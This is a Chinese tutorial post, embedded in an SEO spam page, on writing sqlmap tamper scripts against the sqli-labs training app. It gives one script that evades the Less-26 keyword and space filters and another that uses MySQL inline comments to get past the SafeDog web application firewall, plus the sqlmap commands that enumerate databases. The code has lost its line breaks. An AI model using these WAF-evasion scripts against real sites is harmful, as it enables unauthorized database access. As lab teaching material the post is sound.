当前位置: 首页 > news >正文

南通网站建设方案咨询新手从零基础建站初级网站建设

news 2025/9/9 4:51:02
南通网站建设方案咨询,新手从零基础建站初级网站建设,wordpress 百万数据,wordpress sns文章目录 tamper脚本是什么?指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么? SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLM…

文章目录

  • tamper脚本是什么?
  • 指定tamper脚本运行sqlmap
  • 安全狗绕过tamper脚本

tamper脚本是什么?

SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本。

sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。

指定tamper脚本运行sqlmap

在kali中用下面命令查找sqlmap所在的目录:

find / -name sqlmap

如图,查找成功:

在这里插入图片描述

下面是一个简单的tamper脚本,它将关键字#、and、or和空格都做了替换(and、or双写大小写绕过),加上(?i)忽略大小写(以sqli-labs第26关为例,经过测试这关会过滤空格and、or和空格,需要做双写和大小写绕过):

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):"""<space>             %a0and                 anANDd--+                  and '1or                  oORr"""payload = re.sub(r"(?i)#"," and '1",payload)payload = re.sub(r"(?i)and","anANDd",payload)payload = re.sub(r"(?i)or","oORr",payload)payload = re.sub(r"(?i)\ ","%a0",payload)return payload

将这段代码放入一个sqli-labs_26.py中,并将文件放到sqlmap所在的目录:
在这里插入图片描述

运行xampp,打开sqli-labs_26复制路径:

在这里插入图片描述

然后在kali中输入下面命令,运行sqlmap:

-tamper指定运行的tamper脚本

–current-db列出当前数据库

-u指定url

-v 指定sqlmap的回显等级

–dbs 列出所有的数据库

python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id=2 -v3 -tamper sqli-labs_26.py --current-db

如下图,获取到数据库的名称为security,类型为联合查询:

在这里插入图片描述

安全狗绕过tamper脚本

绕过安全狗

1.脏数据

2.大小写转换

3.双写

4.内联注释

安装安全狗,以sqli-labs第1关为例,绕过安全狗应该从上面4个方面考虑,经过测试,只有第四个方法可行,下面是一个内联注释的脚本:

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload = re.sub(r"(?i)and", "/*!14400and*/", payload)payload = re.sub(r"(?i)order by", "/**/order/*/%0a*a*/by/**/", payload)payload = re.sub(r"(?i)union select", "union/*!88888cas*//*/%0a*a*/select/**/", payload) payload = re.sub(r"(?i)union all select", "union/*!88888cas*//*/%0a*a*/select/**/", payload)payload = re.sub(r"(?i)from information_schema.schemata", "/*!from--%0f/*%0ainformation_schema.schemata*/", payload)payload = re.sub(r"(?i)from information_schema.tables", "/*!from--%0f/*%0ainformation_schema.tables*/", payload)payload = re.sub(r"(?i)from information_schema.columns", "/*!from--%0f/*%0ainformation_schema.columns*/", payload)payload = re.sub(r"(?i)database\(\)", "database(/*!/*/**%0fAJEST*/*/)", payload)#payload = re.sub(r"(?i)count\(*\)","count(1)",payload)payload = re.sub(r"(?i) as","/*!14400as*/",payload)payload = re.sub(r"(?i)char","/*!14400char*/",payload)return payload

和之前获取数据库名称一样,将该脚本文件放到sqlmap所在目录下:

在这里插入图片描述

然后用下面命令运行sqlmap,获取数据库名称:

python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id=1 -v3 --tamper safedog.py --random-agent --dbs

如图,用该脚本文件做tamper绕过安全狗(绕waf)成功,获得数据库名称:

在这里插入图片描述

http://www.15wanjia.com/news/180468.html

相关文章:

  • 网站建设制作专业计量检测网站平台建设方案
  • 造作网站开发太原做彩票网站公司
  • net域名网站做asp网站的步骤
  • 安徽网站全屏网站模板制作
  • 网站建设佰首选金手指二五行业门户网站cms
  • 兰州市做网站的公司服务周到的网站建设
  • 怎么做网站接家纺订单公司网络规划设计方案
  • 招标代理网站建设wordpress 自动采集
  • 做网站商城需要申请商标吗onepress wordpress
  • 做电影网站违法做二手房比较好的网站
  • 网站跳出率的衡量标准北京众合天下管理咨询有限公司
  • 优化网站找哪家广州seo服务公司
  • 网站pv uv是什么意思网站设计平台
  • 网站建设需要哪些材料黄页推广2021
  • 大型医院设计网站建设wordpress更改固定连接后404
  • 网站建设小细节图片可以注册公司的地址
  • iis怎么创建网站成都百度推广优化创意
  • 如何做cpa单页网站wordpress自动添加视频播放
  • 哈尔滨网站关键词优化wordpress主题后空白
  • 做视频的网站多少钱有道搜索引擎入口
  • 网站不备案可以上线吗国家工商局企业查询系统官网
  • 中国建筑集团有限公司官网赵钊佛山百度seo代理
  • 快乐十分网站开发性价比高的seo网站优化
  • phpcms如何发布网站搜索引擎优化seo应用
  • 合肥建站公司排名前十名骆驼有没有做网站的公司
  • 网站托管费免费的舆情网站入口有哪些
  • 台州临海市建设局网站html表格菜鸟教程
  • 网站建设教学廊坊专业做招聘的网站
  • 招聘网站建设人员社交网站用户体验
  • 建免费网站学校网站建设开发方案书